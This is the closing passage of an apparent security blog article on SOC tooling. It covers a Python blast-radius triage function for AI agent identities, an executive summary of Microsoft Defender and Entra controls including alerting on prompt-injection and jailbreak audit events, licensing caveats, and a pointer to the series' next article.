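        br = blast_radius(r["AgentId"], inventory)
        incidents.append({
            "agent": r["AgentId"],
            "operation": r["Operation"],
            "time": r["CreationTime"],
            "severity": "P1" if br["write_scopes"] else "P2",
            "downstream_agents": len(br["agents"]) - 1,
            "write_scopes": br["write_scopes"],
        })
    return incidents


if __name__ == "__main__":
    for incident in triage(AUDIT_RECORDS, inventory=AGENTS):
        print(incident)
```

Running `blast_radius` over every agent at deployment time is the pre-deployment check the section calls for: an orchestrator that holds only read scopes itself still inherits `Sites.ReadWrite.All` and `Mail.Send` through the invoice bot it calls, which is the permission set you'd be reviewing for removal before the first XPIADetected event, not after.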


Executive summary for security leadership

  • The three controls that address five of the ten documented breach patterns: Entra ID Protection P2 for credential protection, Defender for Endpoint P2 for endpoint behavioral detection, and Defender for Cloud Apps for cloud app visibility.

  • Those three cover infostealer abuse, ransomware lateral movement, BEC, cloud identity attacks, and data exfiltration. Vulnerability exploitation, third-party exposure, supply chain (T9), and insider threats (T10) need dedicated program investment beyond tooling.

  • The bonus AI agent coverage is live now. XPIADetected and JailbreakDetected are generally available event types in the Purview unified audit log. The SOC's responsibility here is tenant-wide — not just agents the SOC operates, but every agent service principal deployed across M365 Copilot, business process automation, and development pipelines. Inventory all agent identities, run blast radius analysis on each, and have XPIADetected alerting before your first incident — not after.

  • Most organizations with M365 E5 already own the licenses for all of this. The gap is configuration and integration, not procurement.


Licensing reality check

The tool recommendations in this article reflect current Microsoft licensing tiers, primarily Microsoft 365 E5 and the various Defender plans. Check your current licensing for exact feature availability; some capabilities require add-on licenses or specific SKUs.

Configuration details here are starting points. Every environment has different baselines, user behavior patterns, and risk tolerance. You'll need to tune thresholds and policies for your specific situation.


What's next

Knowing which tools to deploy is the first step.

Knowing which logs to actually turn on and forward to Sentinel — so those tools generate actionable detections — is what we cover next.

Next up: Article 2: The Log Sources Your SOC Needs for Detection, Forensics, and Hunting

Start with the Entra ID and Defender XDR connectors in Sentinel and work through the list in sequence. The gaps will become obvious once you see which queries return no data.


This article is part of the Threat-Informed Defense Series: The Agentic SOC. See the pillar article for the complete framework.